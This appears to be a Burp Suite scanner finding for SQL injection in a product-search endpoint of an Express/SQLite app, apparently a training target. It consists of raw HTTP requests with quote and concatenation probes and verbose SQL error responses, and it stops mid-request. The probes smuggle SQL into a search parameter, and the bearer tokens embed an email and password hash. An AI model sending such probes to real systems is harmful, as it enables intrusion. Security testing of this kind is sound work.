Severity:   High
Confidence:   Firm
Host:   http://192.168.61.143:3000
Path:   /rest/product/search

Note: This issue was generated by the Burp extension: Backslash Powered Scanner.

Issue detail

The application reacts to inputs in a way that suggests it might be vulnerable to some kind of server-side code injection. The probes are listed below in chronological order.

Successful probes

Request 1

GET /rest/product/search?q=orangewzjpp8\z`z'z"\&rt9038kw=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:11 GMT
Connection: close
Content-Length: 374

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%orangewzjpp8\\z`z'z\"\\%' OR description LIKE '%orangewzjpp8\\z`z'z\"\\%') AND deletedAt IS NULL) ORDER BY name"
}
}

Request 2

GET /rest/product/search?q=orangeuc1687\`z''z\"\\&mpsy5zzl=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 2

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:14:08 GMT
Connection: close

{"status":"success","data":[]}

Request 3

GET /rest/product/search?q=orangevi8137\zz'z&vcw2c4xi=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 3

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:15 GMT
Connection: close
Content-Length: 364

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%orangevi8137\\zz'z%' OR description LIKE '%orangevi8137\\zz'z%') AND deletedAt IS NULL) ORDER BY name"
}
}

Request 4

GET /rest/product/search?q=orangelq6h75z\''z&njqpsuv5=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 4

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:14:12 GMT
Connection: close

{"status":"success","data":[]}

Request 5

GET /rest/product/search?q=orangemgevt0z||'z(z'z&qgz85dvl=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 5

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:18 GMT
Connection: close
Content-Length: 370

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%orangemgevt0z||'z(z'z%' OR description LIKE '%orangemgevt0z||'z(z'z%') AND deletedAt IS NULL) ORDER BY name"
}
}

Request 6

GET /rest/product/search?q=orangeh2r7o6z(z'||'z&msr7c679=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 6

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:14:16 GMT
Connection: close

{"status":"success","data":[]}

Request 7

GET /rest/product/search?q=oranges2h1t7z%2b'z(z'z&ppz5g5rg=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 7

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:21 GMT
Connection: close
Content-Length: 368

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%oranges2h1t7z+'z(z'z%' OR description LIKE '%oranges2h1t7z+'z(z'z%') AND deletedAt IS NULL) ORDER BY name"
}
}

Request 8

GET /rest/product/search?q=orangetumpr0z(z'%2b'z&p04csh2n=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 8

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:14:18 GMT
Connection: close

{"status":"success","data":[]}

Request 9

GET /rest/product/search?q=orangehxmmu2z%26'z(z'z&ljjv7zcp=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 9

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:25 GMT
Connection: close
Content-Length: 368

{
"error": {
"message": "SQLITE_ERROR: near \"z\": syntax error",
"stack": "Error: SQLITE_ERROR: near \"z\": syntax error\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%orangehxmmu2z&'z(z'z%' OR description LIKE '%orangehxmmu2z&'z(z'z%') AND deletedAt IS NULL) ORDER BY name"
}
}

Request 10

GET /rest/product/search?q=orangegttcj2z(z'%26'z&nzdv384l=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 10

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Content-Length: 30
ETag: W/"1e-N+XTfS9EqgTKBMySu+0kzA"
Date: Sun, 15 Jan 2017 21:14:22 GMT
Connection: close

{"status":"success","data":[]}

Request 11

GET /rest/product/search?q=orangehsgbr8'||abf(1)||'&xbaf9utv=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
Referer: http://192.168.61.143:3000/
Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
DNT: 1
Connection: close

Response 11

HTTP/1.1 500 Internal Server Error
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Type: application/json; charset=utf-8
Date: Sun, 15 Jan 2017 21:14:34 GMT
Connection: close
Content-Length: 370

{
"error": {
"message": "SQLITE_ERROR: no such function: abf",
"stack": "Error: SQLITE_ERROR: no such function: abf\n at Error (native)",
"errno": 1,
"code": "SQLITE_ERROR",
"sql": "SELECT * FROM Products WHERE ((name LIKE '%orangehsgbr8'||abf(1)||'%' OR description LIKE '%orangehsgbr8'||abf(1)||'%') AND deletedAt IS NULL) ORDER BY name"
}
}

Request 12

GET /rest/product/search?q=orangeh06tu7'||abs(1)||'&il2fexl6=1 HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
